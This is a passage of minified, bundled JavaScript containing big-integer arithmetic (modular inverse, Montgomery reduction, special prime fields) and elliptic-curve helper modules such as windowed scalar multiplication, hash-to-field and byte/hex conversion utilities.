                            if (p > 0) for(r.iushrn(p); p-- > 0;)(a.isOdd() || u.isOdd()) && (a.iadd(l), u.isub(d)), a.iushrn(1), u.iushrn(1);
                            t.cmp(r) >= 0 ? (t.isub(r), i.isub(a), s.isub(u)) : (r.isub(t), a.isub(i), u.isub(s));
                        }
                        return {
                            a: a,
                            b: u,
                            gcd: r.iushln(c)
                        };
                    }, o.prototype._invmp = function(e) {
                        n(0 === e.negative), n(!e.isZero());
                        var t = this, r = e.clone();
                        t = 0 !== t.negative ? t.umod(e) : t.clone();
                        for(var i, s = new o(1), a = new o(0), u = r.clone(); t.cmpn(1) > 0 && r.cmpn(1) > 0;){
                            for(var c = 0, l = 1; 0 == (t.words[0] & l) && c < 26; ++c, l <<= 1);
                            if (c > 0) for(t.iushrn(c); c-- > 0;)s.isOdd() && s.iadd(u), s.iushrn(1);
                            for(var d = 0, h = 1; 0 == (r.words[0] & h) && d < 26; ++d, h <<= 1);
                            if (d > 0) for(r.iushrn(d); d-- > 0;)a.isOdd() && a.iadd(u), a.iushrn(1);
                            t.cmp(r) >= 0 ? (t.isub(r), s.isub(a)) : (r.isub(t), a.isub(s));
                        }
                        return (i = 0 === t.cmpn(1) ? s : a).cmpn(0) < 0 && i.iadd(e), i;
                    }, o.prototype.gcd = function(e) {
                        if (this.isZero()) return e.abs();
                        if (e.isZero()) return this.abs();
                        var t = this.clone(), r = e.clone();
                        t.negative = 0, r.negative = 0;
                        for(var n = 0; t.isEven() && r.isEven(); n++)t.iushrn(1), r.iushrn(1);
                        for(;;){
                            for(; t.isEven();)t.iushrn(1);
                            for(; r.isEven();)r.iushrn(1);
                            var i = t.cmp(r);
                            if (i < 0) {
                                var o = t;
                                t = r, r = o;
                            } else if (0 === i || 0 === r.cmpn(1)) break;
                            t.isub(r);
                        }
                        return r.iushln(n);
                    }, o.prototype.invm = function(e) {
                        return this.egcd(e).a.umod(e);
                    }, o.prototype.isEven = function() {
                        return 0 == (1 & this.words[0]);
                    }, o.prototype.isOdd = function() {
                        return 1 == (1 & this.words[0]);
                    }, o.prototype.andln = function(e) {
                        return this.words[0] & e;
                    }, o.prototype.bincn = function(e) {
                        n("number" == typeof e);
                        var t = e % 26, r = (e - t) / 26, i = 1 << t;
                        if (this.length <= r) return this._expand(r + 1), this.words[r] |= i, this;
                        for(var o = i, s = r; 0 !== o && s < this.length; s++){
                            var a = 0 | this.words[s];
                            o = (a += o) >>> 26, a &= 67108863, this.words[s] = a;
                        }
                        return 0 !== o && (this.words[s] = o, this.length++), this;
                    }, o.prototype.isZero = function() {
                        return 1 === this.length && 0 === this.words[0];
                    }, o.prototype.cmpn = function(e) {
                        var t, r = e < 0;
                        if (0 !== this.negative && !r) return -1;
                        if (0 === this.negative && r) return 1;
                        if (this._strip(), this.length > 1) t = 1;
                        else {
                            r && (e = -e), n(e <= 67108863, "Number is too big");
                            var i = 0 | this.words[0];
                            t = i === e ? 0 : i < e ? -1 : 1;
                        }
                        return 0 !== this.negative ? 0 | -t : t;
                    }, o.prototype.cmp = function(e) {
                        if (0 !== this.negative && 0 === e.negative) return -1;
                        if (0 === this.negative && 0 !== e.negative) return 1;
                        var t = this.ucmp(e);
                        return 0 !== this.negative ? 0 | -t : t;
                    }, o.prototype.ucmp = function(e) {
                        if (this.length > e.length) return 1;
                        if (this.length < e.length) return -1;
                        for(var t = 0, r = this.length - 1; r >= 0; r--){
                            var n = 0 | this.words[r], i = 0 | e.words[r];
                            if (n !== i) {
                                n < i ? t = -1 : n > i && (t = 1);
                                break;
                            }
                        }
                        return t;
                    }, o.prototype.gtn = function(e) {
                        return 1 === this.cmpn(e);
                    }, o.prototype.gt = function(e) {
                        return 1 === this.cmp(e);
                    }, o.prototype.gten = function(e) {
                        return this.cmpn(e) >= 0;
                    }, o.prototype.gte = function(e) {
                        return this.cmp(e) >= 0;
                    }, o.prototype.ltn = function(e) {
                        return -1 === this.cmpn(e);
                    }, o.prototype.lt = function(e) {
                        return -1 === this.cmp(e);
                    }, o.prototype.lten = function(e) {
                        return this.cmpn(e) <= 0;
                    }, o.prototype.lte = function(e) {
                        return this.cmp(e) <= 0;
                    }, o.prototype.eqn = function(e) {
                        return 0 === this.cmpn(e);
                    }, o.prototype.eq = function(e) {
                        return 0 === this.cmp(e);
                    }, o.red = function(e) {
                        return new I(e);
                    }, o.prototype.toRed = function(e) {
                        return n(!this.red, "Already a number in reduction context"), n(0 === this.negative, "red works only with positives"), e.convertTo(this)._forceRed(e);
                    }, o.prototype.fromRed = function() {
                        return n(this.red, "fromRed works only with numbers in reduction context"), this.red.convertFrom(this);
                    }, o.prototype._forceRed = function(e) {
                        return this.red = e, this;
                    }, o.prototype.forceRed = function(e) {
                        return n(!this.red, "Already a number in reduction context"), this._forceRed(e);
                    }, o.prototype.redAdd = function(e) {
                        return n(this.red, "redAdd works only with red numbers"), this.red.add(this, e);
                    }, o.prototype.redIAdd = function(e) {
                        return n(this.red, "redIAdd works only with red numbers"), this.red.iadd(this, e);
                    }, o.prototype.redSub = function(e) {
                        return n(this.red, "redSub works only with red numbers"), this.red.sub(this, e);
                    }, o.prototype.redISub = function(e) {
                        return n(this.red, "redISub works only with red numbers"), this.red.isub(this, e);
                    }, o.prototype.redShl = function(e) {
                        return n(this.red, "redShl works only with red numbers"), this.red.shl(this, e);
                    }, o.prototype.redMul = function(e) {
                        return n(this.red, "redMul works only with red numbers"), this.red._verify2(this, e), this.red.mul(this, e);
                    }, o.prototype.redIMul = function(e) {
                        return n(this.red, "redMul works only with red numbers"), this.red._verify2(this, e), this.red.imul(this, e);
                    }, o.prototype.redSqr = function() {
                        return n(this.red, "redSqr works only with red numbers"), this.red._verify1(this), this.red.sqr(this);
                    }, o.prototype.redISqr = function() {
                        return n(this.red, "redISqr works only with red numbers"), this.red._verify1(this), this.red.isqr(this);
                    }, o.prototype.redSqrt = function() {
                        return n(this.red, "redSqrt works only with red numbers"), this.red._verify1(this), this.red.sqrt(this);
                    }, o.prototype.redInvm = function() {
                        return n(this.red, "redInvm works only with red numbers"), this.red._verify1(this), this.red.invm(this);
                    }, o.prototype.redNeg = function() {
                        return n(this.red, "redNeg works only with red numbers"), this.red._verify1(this), this.red.neg(this);
                    }, o.prototype.redPow = function(e) {
                        return n(this.red && !e.red, "redPow(normalNum)"), this.red._verify1(this), this.red.pow(this, e);
                    };
                    var E = {
                        k256: null,
                        p224: null,
                        p192: null,
                        p25519: null
                    };
                    function A(e, t) {
                        this.name = e, this.p = new o(t, 16), this.n = this.p.bitLength(), this.k = new o(1).iushln(this.n).isub(this.p), this.tmp = this._tmp();
                    }
                    function _() {
                        A.call(this, "k256", "ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f");
                    }
                    function w() {
                        A.call(this, "p224", "ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001");
                    }
                    function T() {
                        A.call(this, "p192", "ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff");
                    }
                    function R() {
                        A.call(this, "25519", "7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed");
                    }
                    function I(e) {
                        if ("string" == typeof e) {
                            var t = o._prime(e);
                            this.m = t.p, this.prime = t;
                        } else n(e.gtn(1), "modulus must be greater than 1"), this.m = e, this.prime = null;
                    }
                    function S(e) {
                        I.call(this, e), this.shift = this.m.bitLength(), this.shift % 26 != 0 && (this.shift += 26 - this.shift % 26), this.r = new o(1).iushln(this.shift), this.r2 = this.imod(this.r.sqr()), this.rinv = this.r._invmp(this.m), this.minv = this.rinv.mul(this.r).isubn(1).div(this.m), this.minv = this.minv.umod(this.r), this.minv = this.r.sub(this.minv);
                    }
                    A.prototype._tmp = function() {
                        var e = new o(null);
                        return e.words = new Array(Math.ceil(this.n / 13)), e;
                    }, A.prototype.ireduce = function(e) {
                        var t, r = e;
                        do this.split(r, this.tmp), t = (r = (r = this.imulK(r)).iadd(this.tmp)).bitLength();
                        while (t > this.n);
                        var n = t < this.n ? -1 : r.ucmp(this.p);
                        return 0 === n ? (r.words[0] = 0, r.length = 1) : n > 0 ? r.isub(this.p) : void 0 !== r.strip ? r.strip() : r._strip(), r;
                    }, A.prototype.split = function(e, t) {
                        e.iushrn(this.n, 0, t);
                    }, A.prototype.imulK = function(e) {
                        return e.imul(this.k);
                    }, i(_, A), _.prototype.split = function(e, t) {
                        for(var r = 4194303, n = Math.min(e.length, 9), i = 0; i < n; i++)t.words[i] = e.words[i];
                        if (t.length = n, e.length <= 9) return e.words[0] = 0, void (e.length = 1);
                        var o = e.words[9];
                        for(t.words[t.length++] = o & r, i = 10; i < e.length; i++){
                            var s = 0 | e.words[i];
                            e.words[i - 10] = (s & r) << 4 | o >>> 22, o = s;
                        }
                        o >>>= 22, e.words[i - 10] = o, 0 === o && e.length > 10 ? e.length -= 10 : e.length -= 9;
                    }, _.prototype.imulK = function(e) {
                        e.words[e.length] = 0, e.words[e.length + 1] = 0, e.length += 2;
                        for(var t = 0, r = 0; r < e.length; r++){
                            var n = 0 | e.words[r];
                            t += 977 * n, e.words[r] = 67108863 & t, t = 64 * n + (t / 67108864 | 0);
                        }
                        return 0 === e.words[e.length - 1] && (e.length--, 0 === e.words[e.length - 1] && e.length--), e;
                    }, i(w, A), i(T, A), i(R, A), R.prototype.imulK = function(e) {
                        for(var t = 0, r = 0; r < e.length; r++){
                            var n = 19 * (0 | e.words[r]) + t, i = 67108863 & n;
                            n >>>= 26, e.words[r] = i, t = n;
                        }
                        return 0 !== t && (e.words[e.length++] = t), e;
                    }, o._prime = function(e) {
                        if (E[e]) return E[e];
                        var t;
                        if ("k256" === e) t = new _;
                        else if ("p224" === e) t = new w;
                        else if ("p192" === e) t = new T;
                        else {
                            if ("p25519" !== e) throw new Error("Unknown prime " + e);
                            t = new R;
                        }
                        return E[e] = t, t;
                    }, I.prototype._verify1 = function(e) {
                        n(0 === e.negative, "red works only with positives"), n(e.red, "red works only with red numbers");
                    }, I.prototype._verify2 = function(e, t) {
                        n(0 == (e.negative | t.negative), "red works only with positives"), n(e.red && e.red === t.red, "red works only with red numbers");
                    }, I.prototype.imod = function(e) {
                        return this.prime ? this.prime.ireduce(e)._forceRed(this) : (l(e, e.umod(this.m)._forceRed(this)), e);
                    }, I.prototype.neg = function(e) {
                        return e.isZero() ? e.clone() : this.m.sub(e)._forceRed(this);
                    }, I.prototype.add = function(e, t) {
                        this._verify2(e, t);
                        var r = e.add(t);
                        return r.cmp(this.m) >= 0 && r.isub(this.m), r._forceRed(this);
                    }, I.prototype.iadd = function(e, t) {
                        this._verify2(e, t);
                        var r = e.iadd(t);
                        return r.cmp(this.m) >= 0 && r.isub(this.m), r;
                    }, I.prototype.sub = function(e, t) {
                        this._verify2(e, t);
                        var r = e.sub(t);
                        return r.cmpn(0) < 0 && r.iadd(this.m), r._forceRed(this);
                    }, I.prototype.isub = function(e, t) {
                        this._verify2(e, t);
                        var r = e.isub(t);
                        return r.cmpn(0) < 0 && r.iadd(this.m), r;
                    }, I.prototype.shl = function(e, t) {
                        return this._verify1(e), this.imod(e.ushln(t));
                    }, I.prototype.imul = function(e, t) {
                        return this._verify2(e, t), this.imod(e.imul(t));
                    }, I.prototype.mul = function(e, t) {
                        return this._verify2(e, t), this.imod(e.mul(t));
                    }, I.prototype.isqr = function(e) {
                        return this.imul(e, e.clone());
                    }, I.prototype.sqr = function(e) {
                        return this.mul(e, e);
                    }, I.prototype.sqrt = function(e) {
                        if (e.isZero()) return e.clone();
                        var t = this.m.andln(3);
                        if (n(t % 2 == 1), 3 === t) {
                            var r = this.m.add(new o(1)).iushrn(2);
                            return this.pow(e, r);
                        }
                        for(var i = this.m.subn(1), s = 0; !i.isZero() && 0 === i.andln(1);)s++, i.iushrn(1);
                        n(!i.isZero());
                        var a = new o(1).toRed(this), u = a.redNeg(), c = this.m.subn(1).iushrn(1), l = this.m.bitLength();
                        for(l = new o(2 * l * l).toRed(this); 0 !== this.pow(l, c).cmp(u);)l.redIAdd(u);
                        for(var d = this.pow(l, i), h = this.pow(e, i.addn(1).iushrn(1)), f = this.pow(e, i), p = s; 0 !== f.cmp(a);){
                            for(var m = f, g = 0; 0 !== m.cmp(a); g++)m = m.redSqr();
                            n(g < p);
                            var y = this.pow(d, new o(1).iushln(p - g - 1));
                            h = h.redMul(y), d = y.redSqr(), f = f.redMul(d), p = g;
                        }
                        return h;
                    }, I.prototype.invm = function(e) {
                        var t = e._invmp(this.m);
                        return 0 !== t.negative ? (t.negative = 0, this.imod(t).redNeg()) : this.imod(t);
                    }, I.prototype.pow = function(e, t) {
                        if (t.isZero()) return new o(1).toRed(this);
                        if (0 === t.cmpn(1)) return e.clone();
                        var r = new Array(16);
                        r[0] = new o(1).toRed(this), r[1] = e;
                        for(var n = 2; n < r.length; n++)r[n] = this.mul(r[n - 1], e);
                        var i = r[0], s = 0, a = 0, u = t.bitLength() % 26;
                        for(0 === u && (u = 26), n = t.length - 1; n >= 0; n--){
                            for(var c = t.words[n], l = u - 1; l >= 0; l--){
                                var d = c >> l & 1;
                                i !== r[0] && (i = this.sqr(i)), 0 !== d || 0 !== s ? (s <<= 1, s |= d, (4 == ++a || 0 === n && 0 === l) && (i = this.mul(i, r[s]), a = 0, s = 0)) : a = 0;
                            }
                            u = 26;
                        }
                        return i;
                    }, I.prototype.convertTo = function(e) {
                        var t = e.umod(this.m);
                        return t === e ? t.clone() : t;
                    }, I.prototype.convertFrom = function(e) {
                        var t = e.clone();
                        return t.red = null, t;
                    }, o.mont = function(e) {
                        return new S(e);
                    }, i(S, I), S.prototype.convertTo = function(e) {
                        return this.imod(e.ushln(this.shift));
                    }, S.prototype.convertFrom = function(e) {
                        var t = this.imod(e.mul(this.rinv));
                        return t.red = null, t;
                    }, S.prototype.imul = function(e, t) {
                        if (e.isZero() || t.isZero()) return e.words[0] = 0, e.length = 1, e;
                        var r = e.imul(t), n = r.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m), i = r.isub(n).iushrn(this.shift), o = i;
                        return i.cmp(this.m) >= 0 ? o = i.isub(this.m) : i.cmpn(0) < 0 && (o = i.iadd(this.m)), o._forceRed(this);
                    }, S.prototype.mul = function(e, t) {
                        if (e.isZero() || t.isZero()) return new o(0)._forceRed(this);
                        var r = e.mul(t), n = r.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m), i = r.isub(n).iushrn(this.shift), s = i;
                        return i.cmp(this.m) >= 0 ? s = i.isub(this.m) : i.cmpn(0) < 0 && (s = i.iadd(this.m)), s._forceRed(this);
                    }, S.prototype.invm = function(e) {
                        return this.imod(e._invmp(this.m).mul(this.r2))._forceRed(this);
                    };
                }(e = r.nmd(e), this);
            },
            5887: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.createCurve = t.getHash = void 0;
                const n = r(1377), i = r(64), o = r(7851);
                function s(e) {
                    return {
                        hash: e,
                        hmac: (t, ...r)=>(0, n.hmac)(e, t, (0, i.concatBytes)(...r)),
                        randomBytes: i.randomBytes
                    };
                }
                t.getHash = s, t.createCurve = function(e, t) {
                    const r = (t)=>(0, o.weierstrass)({
                            ...e,
                            ...s(t)
                        });
                    return Object.freeze({
                        ...r(t),
                        create: r
                    });
                };
            },
            1465: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.validateBasic = t.wNAF = void 0;
                const n = r(9530), i = r(4323), o = BigInt(0), s = BigInt(1);
                t.wNAF = function(e, t) {
                    const r = (e, t)=>{
                        const r = t.negate();
                        return e ? r : t;
                    }, n = (e)=>({
                            windows: Math.ceil(t / e) + 1,
                            windowSize: 2 ** (e - 1)
                        });
                    return {
                        constTimeNegate: r,
                        unsafeLadder (t, r) {
                            let n = e.ZERO, i = t;
                            for(; r > o;)r & s && (n = n.add(i)), i = i.double(), r >>= s;
                            return n;
                        },
                        precomputeWindow (e, t) {
                            const { windows: r, windowSize: i } = n(t), o = [];
                            let s = e, a = s;
                            for(let e = 0; e < r; e++){
                                a = s, o.push(a);
                                for(let e = 1; e < i; e++)a = a.add(s), o.push(a);
                                s = a.double();
                            }
                            return o;
                        },
                        wNAF (t, i, o) {
                            const { windows: a, windowSize: u } = n(t);
                            let c = e.ZERO, l = e.BASE;
                            const d = BigInt(2 ** t - 1), h = 2 ** t, f = BigInt(t);
                            for(let e = 0; e < a; e++){
                                const t = e * u;
                                let n = Number(o & d);
                                o >>= f, n > u && (n -= h, o += s);
                                const a = t, p = t + Math.abs(n) - 1, m = e % 2 != 0, g = n < 0;
                                0 === n ? l = l.add(r(m, i[a])) : c = c.add(r(g, i[p]));
                            }
                            return {
                                p: c,
                                f: l
                            };
                        },
                        wNAFCached (e, t, r, n) {
                            const i = e._WINDOW_SIZE || 1;
                            let o = t.get(e);
                            return o || (o = this.precomputeWindow(e, i), 1 !== i && t.set(e, n(o))), this.wNAF(i, o, r);
                        }
                    };
                }, t.validateBasic = function(e) {
                    return (0, n.validateField)(e.Fp), (0, i.validateObject)(e, {
                        n: "bigint",
                        h: "bigint",
                        Gx: "field",
                        Gy: "field"
                    }, {
                        nBitLength: "isSafeInteger",
                        nByteLength: "isSafeInteger"
                    }), Object.freeze({
                        ...(0, n.nLength)(e.n, e.nBitLength),
                        ...e,
                        p: e.Fp.ORDER
                    });
                };
            },
            1322: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.createHasher = t.isogenyMap = t.hash_to_field = t.expand_message_xof = t.expand_message_xmd = void 0;
                const n = r(9530), i = r(4323), o = i.bytesToNumberBE;
                function s(e, t) {
                    if (e < 0 || e >= 1 << 8 * t) throw new Error(`bad I2OSP call: value=${e} length=${t}`);
                    const r = Array.from({
                        length: t
                    }).fill(0);
                    for(let n = t - 1; n >= 0; n--)r[n] = 255 & e, e >>>= 8;
                    return new Uint8Array(r);
                }
                function a(e, t) {
                    const r = new Uint8Array(e.length);
                    for(let n = 0; n < e.length; n++)r[n] = e[n] ^ t[n];
                    return r;
                }
                function u(e) {
                    if (!(e instanceof Uint8Array)) throw new Error("Uint8Array expected");
                }
                function c(e) {
                    if (!Number.isSafeInteger(e)) throw new Error("number expected");
                }
                function l(e, t, r, n) {
                    u(e), u(t), c(r), t.length > 255 && (t = n((0, i.concatBytes)((0, i.utf8ToBytes)("H2C-OVERSIZE-DST-"), t)));
                    const { outputLen: o, blockLen: l } = n, d = Math.ceil(r / o);
                    if (d > 255) throw new Error("Invalid xmd length");
                    const h = (0, i.concatBytes)(t, s(t.length, 1)), f = s(0, l), p = s(r, 2), m = new Array(d), g = n((0, i.concatBytes)(f, e, p, s(0, 1), h));
                    m[0] = n((0, i.concatBytes)(g, s(1, 1), h));
                    for(let e = 1; e <= d; e++){
                        const t = [
                            a(g, m[e - 1]),
                            s(e + 1, 1),
                            h
                        ];
                        m[e] = n((0, i.concatBytes)(...t));
                    }
                    return (0, i.concatBytes)(...m).slice(0, r);
                }
                function d(e, t, r, n, o) {
                    if (u(e), u(t), c(r), t.length > 255) {
                        const e = Math.ceil(2 * n / 8);
                        t = o.create({
                            dkLen: e
                        }).update((0, i.utf8ToBytes)("H2C-OVERSIZE-DST-")).update(t).digest();
                    }
                    if (r > 65535 || t.length > 255) throw new Error("expand_message_xof: invalid lenInBytes");
                    return o.create({
                        dkLen: r
                    }).update(e).update(s(r, 2)).update(t).update(s(t.length, 1)).digest();
                }
                function h(e, t, r) {
                    (0, i.validateObject)(r, {
                        DST: "string",
                        p: "bigint",
                        m: "isSafeInteger",
                        k: "isSafeInteger",
                        hash: "hash"
                    });
                    const { p: s, k: a, m: h, hash: f, expand: p, DST: m } = r;
                    u(e), c(t);
                    const g = function(e) {
                        if (e instanceof Uint8Array) return e;
                        if ("string" == typeof e) return (0, i.utf8ToBytes)(e);
                        throw new Error("DST must be Uint8Array or string");
                    }(m), y = s.toString(2).length, v = Math.ceil((y + a) / 8), b = t * h * v;
                    let E;
                    if ("xmd" === p) E = l(e, g, b, f);
                    else if ("xof" === p) E = d(e, g, b, a, f);
                    else {
                        if ("_internal_pass" !== p) throw new Error('expand must be "xmd" or "xof"');
                        E = e;
                    }
                    const A = new Array(t);
                    for(let e = 0; e < t; e++){
                        const t = new Array(h);
                        for(let r = 0; r < h; r++){
                            const i = v * (r + e * h), a = E.subarray(i, i + v);
                            t[r] = (0, n.mod)(o(a), s);
                        }
                        A[e] = t;
                    }
                    return A;
                }
                t.expand_message_xmd = l, t.expand_message_xof = d, t.hash_to_field = h, t.isogenyMap = function(e, t) {
                    const r = t.map((e)=>Array.from(e).reverse());
                    return (t, n)=>{
                        const [i, o, s, a] = r.map((r)=>r.reduce((r, n)=>e.add(e.mul(r, t), n)));
                        return t = e.div(i, o), n = e.mul(n, e.div(s, a)), {
                            x: t,
                            y: n
                        };
                    };
                }, t.createHasher = function(e, t, r) {
                    if ("function" != typeof t) throw new Error("mapToCurve() must be defined");
                    return {
                        hashToCurve (n, i) {
                            const o = h(n, 2, {
                                ...r,
                                DST: r.DST,
                                ...i
                            }), s = e.fromAffine(t(o[0])), a = e.fromAffine(t(o[1])), u = s.add(a).clearCofactor();
                            return u.assertValidity(), u;
                        },
                        encodeToCurve (n, i) {
                            const o = h(n, 1, {
                                ...r,
                                DST: r.encodeDST,
                                ...i
                            }), s = e.fromAffine(t(o[0])).clearCofactor();
                            return s.assertValidity(), s;
                        }
                    };
                };
            },
            9530: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.hashToPrivateScalar = t.FpSqrtEven = t.FpSqrtOdd = t.Field = t.nLength = t.FpIsSquare = t.FpDiv = t.FpInvertBatch = t.FpPow = t.validateField = t.isNegativeLE = t.FpSqrt = t.tonelliShanks = t.invert = t.pow2 = t.pow = t.mod = void 0;
                const n = r(4323), i = BigInt(0), o = BigInt(1), s = BigInt(2), a = BigInt(3), u = BigInt(4), c = BigInt(5), l = BigInt(8);
                function d(e, t) {
                    const r = e % t;
                    return r >= i ? r : t + r;
                }
                function h(e, t, r) {
                    if (r <= i || t < i) throw new Error("Expected power/modulo > 0");
                    if (r === o) return i;
                    let n = o;
                    for(; t > i;)t & o && (n = n * e % r), e = e * e % r, t >>= o;
                    return n;
                }
                function f(e, t) {
                    if (e === i || t <= i) throw new Error(`invert: expected positive integers, got n=${e} mod=${t}`);
                    let r = d(e, t), n = t, s = i, a = o, u = o, c = i;
                    for(; r !== i;){
                        const e = n / r, t = n % r, i = s - u * e, o = a - c * e;
                        n = r, r = t, s = u, a = c, u = i, c = o;
                    }
                    if (n !== o) throw new Error("invert: does not exist");
                    return d(s, t);
                }
                function p(e) {
                    const t = (e - o) / s;
                    let r, n, a;
                    for(r = e - o, n = 0; r % s === i; r /= s, n++);
                    for(a = s; a < e && h(a, t, e) !== e - o; a++);
                    if (1 === n) {
                        const t = (e + o) / u;
                        return function(e, r) {
                            const n = e.pow(r, t);
                            if (!e.eql(e.sqr(n), r)) throw new Error("Cannot find square root");
                            return n;
                        };
                    }
                    const c = (r + o) / s;
                    return function(e, i) {
                        if (e.pow(i, t) === e.neg(e.ONE)) throw new Error("Cannot find square root");
                        let s = n, u = e.pow(e.mul(e.ONE, a), r), l = e.pow(i, c), d = e.pow(i, r);
                        for(; !e.eql(d, e.ONE);){
                            if (e.eql(d, e.ZERO)) return e.ZERO;
                            let t = 1;
                            for(let r = e.sqr(d); t < s && !e.eql(r, e.ONE); t++)r = e.sqr(r);
                            const r = e.pow(u, o << BigInt(s - t - 1));
                            u = e.sqr(r), l = e.mul(l, r), d = e.mul(d, u), s = t;
                        }
                        return l;
                    };
                }
                function m(e) {
                    if (e % u === a) {
                        const t = (e + o) / u;
                        return function(e, r) {
                            const n = e.pow(r, t);
                            if (!e.eql(e.sqr(n), r)) throw new Error("Cannot find square root");
                            return n;
                        };
                    }
                    if (e % l === c) {
                        const t = (e - c) / l;
                        return function(e, r) {
                            const n = e.mul(r, s), i = e.pow(n, t), o = e.mul(r, i), a = e.mul(e.mul(o, s), i), u = e.mul(o, e.sub(a, e.ONE));
                            if (!e.eql(e.sqr(u), r)) throw new Error("Cannot find square root");
                            return u;
                        };
                    }
                    return p(e);
                }
                BigInt(9), BigInt(16), t.mod = d, t.pow = h, t.pow2 = function(e, t, r) {
                    let n = e;
                    for(; t-- > i;)n *= n, n %= r;
                    return n;
                }, t.invert = f, t.tonelliShanks = p, t.FpSqrt = m, t.isNegativeLE = (e, t)=>(d(e, t) & o) === o;
                const g = [
                    "create",
                    "isValid",
                    "is0",
                    "neg",
                    "inv",
                    "sqrt",
                    "sqr",
                    "eql",
                    "add",
                    "sub",
                    "mul",
                    "pow",
                    "div",
                    "addN",
                    "subN",
                    "mulN",
                    "sqrN"
                ];
                function y(e, t, r) {
                    if (r < i) throw new Error("Expected power > 0");
                    if (r === i) return e.ONE;
                    if (r === o) return t;
                    let n = e.ONE, s = t;
                    for(; r > i;)r & o && (n = e.mul(n, s)), s = e.sqr(s), r >>= o;
                    return n;
                }
                function v(e, t) {
                    const r = new Array(t.length), n = t.reduce((t, n, i)=>e.is0(n) ? t : (r[i] = t, e.mul(t, n)), e.ONE), i = e.inv(n);
                    return t.reduceRight((t, n, i)=>e.is0(n) ? t : (r[i] = e.mul(t, r[i]), e.mul(t, n)), i), r;
                }
                function b(e, t) {
                    const r = void 0 !== t ? t : e.toString(2).length;
                    return {
                        nBitLength: r,
                        nByteLength: Math.ceil(r / 8)
                    };
                }
                t.validateField = function(e) {
                    const t = g.reduce((e, t)=>(e[t] = "function", e), {
                        ORDER: "bigint",
                        MASK: "bigint",
                        BYTES: "isSafeInteger",
                        BITS: "isSafeInteger"
                    });
                    return (0, n.validateObject)(e, t);
                }, t.FpPow = y, t.FpInvertBatch = v, t.FpDiv = function(e, t, r) {
                    return e.mul(t, "bigint" == typeof r ? f(r, e.ORDER) : e.inv(r));
                }, t.FpIsSquare = function(e) {
                    const t = (e.ORDER - o) / s;
                    return (r)=>{
                        const n = e.pow(r, t);
                        return e.eql(n, e.ZERO) || e.eql(n, e.ONE);
                    };
                }, t.nLength = b, t.Field = function(e, t, r = !1, s = {}) {
                    if (e <= i) throw new Error(`Expected Fp ORDER > 0, got ${e}`);
                    const { nBitLength: a, nByteLength: u } = b(e, t);
                    if (u > 2048) throw new Error("Field lengths over 2048 bytes are not supported");
                    const c = m(e), l = Object.freeze({
                        ORDER: e,
                        BITS: a,
                        BYTES: u,
                        MASK: (0, n.bitMask)(a),
                        ZERO: i,
                        ONE: o,
                        create: (t)=>d(t, e),
                        isValid: (t)=>{
                            if ("bigint" != typeof t) throw new Error("Invalid field element: expected bigint, got " + typeof t);
                            return i <= t && t < e;
                        },
                        is0: (e)=>e === i,
                        isOdd: (e)=>(e & o) === o,
                        neg: (t)=>d(-t, e),
                        eql: (e, t)=>e === t,
                        sqr: (t)=>d(t * t, e),
                        add: (t, r)=>d(t + r, e),
                        sub: (t, r)=>d(t - r, e),
                        mul: (t, r)=>d(t * r, e),
                        pow: (e, t)=>y(l, e, t),
                        div: (t, r)=>d(t * f(r, e), e),
                        sqrN: (e)=>e * e,
                        addN: (e, t)=>e + t,
                        subN: (e, t)=>e - t,
                        mulN: (e, t)=>e * t,
                        inv: (t)=>f(t, e),
                        sqrt: s.sqrt || ((e)=>c(l, e)),
                        invertBatch: (e)=>v(l, e),
                        cmov: (e, t, r)=>r ? t : e,
                        toBytes: (e)=>r ? (0, n.numberToBytesLE)(e, u) : (0, n.numberToBytesBE)(e, u),
                        fromBytes: (e)=>{
                            if (e.length !== u) throw new Error(`Fp.fromBytes: expected ${u}, got ${e.length}`);
                            return r ? (0, n.bytesToNumberLE)(e) : (0, n.bytesToNumberBE)(e);
                        }
                    });
                    return Object.freeze(l);
                }, t.FpSqrtOdd = function(e, t) {
                    if (!e.isOdd) throw new Error("Field doesn't have isOdd");
                    const r = e.sqrt(t);
                    return e.isOdd(r) ? r : e.neg(r);
                }, t.FpSqrtEven = function(e, t) {
                    if (!e.isOdd) throw new Error("Field doesn't have isOdd");
                    const r = e.sqrt(t);
                    return e.isOdd(r) ? e.neg(r) : r;
                }, t.hashToPrivateScalar = function(e, t, r = !1) {
                    const i = (e = (0, n.ensureBytes)("privateHash", e)).length, s = b(t).nByteLength + 8;
                    if (s < 24 || i < s || i > 1024) throw new Error(`hashToPrivateScalar: expected ${s}-1024 bytes of input, got ${i}`);
                    return d(r ? (0, n.bytesToNumberLE)(e) : (0, n.bytesToNumberBE)(e), t - o) + o;
                };
            },
            4323: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.validateObject = t.createHmacDrbg = t.bitMask = t.bitSet = t.bitGet = t.bitLen = t.utf8ToBytes = t.equalBytes = t.concatBytes = t.ensureBytes = t.numberToVarBytesBE = t.numberToBytesLE = t.numberToBytesBE = t.bytesToNumberLE = t.bytesToNumberBE = t.hexToBytes = t.hexToNumber = t.numberToHexUnpadded = t.bytesToHex = void 0;
                const r = BigInt(0), n = BigInt(1), i = BigInt(2), o = (e)=>e instanceof Uint8Array, s = Array.from({
                    length: 256
                }, (e, t)=>t.toString(16).padStart(2, "0"));
                function a(e) {
                    if (!o(e)) throw new Error("Uint8Array expected");
                    let t = "";
                    for(let r = 0; r < e.length; r++)t += s[e[r]];
                    return t;
                }
                function u(e) {
                    const t = e.toString(16);
                    return 1 & t.length ? `0${t}` : t;
                }
                function c(e) {
                    if ("string" != typeof e) throw new Error("hex string expected, got " + typeof e);
                    return BigInt("" === e ? "0" : `0x${e}`);
                }
                function l(e) {
                    if ("string" != typeof e) throw new Error("hex string expected, got " + typeof e);
                    if (e.length % 2) throw new Error("hex string is invalid: unpadded " + e.length);
